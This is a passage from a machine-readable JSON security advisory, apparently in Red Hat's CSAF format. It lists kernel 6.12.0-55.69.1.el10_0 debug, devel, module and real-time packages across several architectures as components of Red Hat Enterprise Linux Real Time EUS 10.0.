"product_id": "RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "RT-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v. 10.0)",
"product_id": "RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64"
},
